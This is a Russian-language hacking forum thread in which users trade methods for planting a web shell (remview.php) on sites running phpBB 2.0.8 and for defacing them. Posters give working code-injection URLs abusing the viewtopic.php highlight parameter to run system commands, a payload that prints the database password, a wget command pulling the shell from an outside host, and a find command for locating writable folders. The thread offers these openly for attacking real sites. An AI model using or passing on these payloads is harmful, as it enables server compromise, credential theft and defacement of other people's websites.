Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group

А как посматреть какие папки открыты на запись???

 

помогите плиззззз

 

Народ какой коммандой можно посматреть какие папки открыты на запись???

 

Дорогие друзья.
Вы хоть раз видели сервер чтоб там было разрешено
`ls` т.е. safe mode?
Я не.
Так что (как у меня в старом видео) - %2527.system($_GET[cmd]).include%2527
INCLUDE нужно для того чтобы кусочек #b( ... убрать из system.

 

find / -perm -2 -ls

 

Смотреть папки, открытые на запись (сервер unix):
ls -la
просто ls - только список, ls -1 - вертикальный

 

А если сервер стоит на винде Хр, то эта комманда не изменится???

 

дык kez написал команды для никсов,а ты про винду!на винде cmd!

 

Ну вот я так и думал.... а для винды как можно посматреть???

 

У себя на тачке:
выполнить cmd
в коммандной help

 

Люди, Я непрошу взломать то или это. Мне нужна статья или какоенибудь пояснение как использовать команды как wget ls -la и т.д. в вэб интерфейсе. Хочу разобраться. Цель заливка remview.php. И есть ли сейчас перспектива в дэфейсе такого плана? Заранее благадарен

 

wget - заливка файла на сайт
ls - просмотр файлов в папке
ls -la - полный просмотр с правами доступа))
перемещение по каталогам, команда: cd
cd .. - перемещение на каталог выше
wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..

 

Можно на примере
http://[Target]/forum/index.php?showtopic=[№]?
Это пример IPB форума ну и остальные аналогично...
Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?

 

&highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
Далее это параметры мускула так?
&highlight=%2527.$poster=`bdname`.%2527
&highlight=%2527.$poster=`bdpass`.%2527
Просмотр попок для записи
&highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

Короче поправте если что то накарябал нетак... =\

 

Во! Нашёл http://forum.antichat.ru/showthread.php?t=5076

 

ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
Последний раз говорю.
Если ктокто придумал такой сплойт это не значит что он работает!
`ls` не разрешено если не safe mode.
Вот так можно
viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!

 

Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
Все правильно!
Если надо узнать пароль\логин к базе
http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpasswd.%2527

 

Ок! Спасибо братуха Разобрался!

 

Пожалуста... надо в новостях это подправить ))